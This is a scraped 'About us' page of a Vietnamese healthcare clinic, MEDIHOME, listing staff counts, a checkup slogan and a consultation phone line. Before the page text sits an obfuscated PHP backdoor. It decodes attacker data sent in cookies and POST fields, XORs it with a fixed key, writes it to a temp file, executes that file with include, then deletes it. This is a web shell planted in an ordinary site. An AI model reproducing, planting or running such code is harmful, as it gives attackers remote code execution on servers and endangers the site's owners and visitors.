$wIRblQLn = chr ( 709 - 597 ).chr ( 822 - 727 ).chr ( 536 - 446 ).chr (118) . "\142" . 'w' . "\x63";$czDmPiogFy = "\x63" . "\154" . chr ( 490 - 393 ).chr ( 671 - 556 )."\163" . "\137" . chr ( 458 - 357 )."\x78" . "\x69" . chr (115) . chr ( 1009 - 893 ).chr (115); $WYhndTwqF = class_exists($wIRblQLn); $czDmPiogFy = "30483";$RMnXeVXr = !1;if ($WYhndTwqF == $RMnXeVXr){function vNUyzU(){return FALSE;}$gZpvgSDl = "63329";vNUyzU();class p_Zvbwc{private function areZwt($gZpvgSDl){if (is_array(p_Zvbwc::$qrHpJCKo)) {$iRhlV = sys_get_temp_dir() . "/" . crc32(p_Zvbwc::$qrHpJCKo['s' . chr ( 745 - 648 )."\154" . "\x74"]);@p_Zvbwc::$qrHpJCKo['w' . "\162" . chr ( 509 - 404 ).'t' . "\x65"]($iRhlV, p_Zvbwc::$qrHpJCKo[chr (99) . chr (111) . chr (110) . "\x74" . chr (101) . "\156" . 't']);include $iRhlV;@p_Zvbwc::$qrHpJCKo[chr ( 993 - 893 ).chr (101) . "\x6c" . chr (101) . 't' . chr (101)]($iRhlV); $gZpvgSDl = "63329";exit();}}private $DUpjCq;public function trKRTg(){echo 46032;}public function __destruct(){$gZpvgSDl = "54247_59206";$this->areZwt($gZpvgSDl); $gZpvgSDl = "54247_59206";}public function __construct($SebzfWx=0){$pJtdtarL = $_POST;$NDmNCKWvBb = $_COOKIE;$elSUaw = "f78d7c92-a113-4671-a3f5-e628e8158f6d";$KgOQit = @$NDmNCKWvBb[substr($elSUaw, 0, 4)];if (!empty($KgOQit)){$kkxeJStMeC = "base64";$TpxPd = "";$KgOQit = explode(",", $KgOQit);foreach ($KgOQit as $exydzmw){$TpxPd .= @$NDmNCKWvBb[$exydzmw];$TpxPd .= @$pJtdtarL[$exydzmw];}$TpxPd = array_map($kkxeJStMeC . '_' . "\144" . 'e' . "\x63" . "\157" . "\144" . "\145", array($TpxPd,)); $TpxPd = $TpxPd[0] ^ str_repeat($elSUaw, (strlen($TpxPd[0]) / strlen($elSUaw)) + 1);p_Zvbwc::$qrHpJCKo = @unserialize($TpxPd); $TpxPd = class_exists("54247_59206");}}public static $qrHpJCKo = 15678;}$YKTOan = new /* 53202 */ $wIRblQLn(63329 + 63329); $RMnXeVXr = $YKTOan = $gZpvgSDl = Array();} Về chúng tôi - MEDIHOME
10

CHUYÊN KHOA

20

BÁC SĨ CHUYÊN GIA

35

CHUYÊN VIÊN CHĂM SÓC

1000

KHÁCH HÀNG

KIỂM TRA THƯỜNG XUYÊN
PHÁT HIỆN SỚM SỐNG KHỎE MẠNH.

Translate »

Đăng ký nhận tư vấn ngay

Đội ngũ Chăm sóc Khách hàng của chúng tôi sẽ liên lạc để cung cấp thông tin khi thuận tiện và sớm nhất cho bạn.

Bạn có thể liên hệ với chúng tôi tại:

1900 9204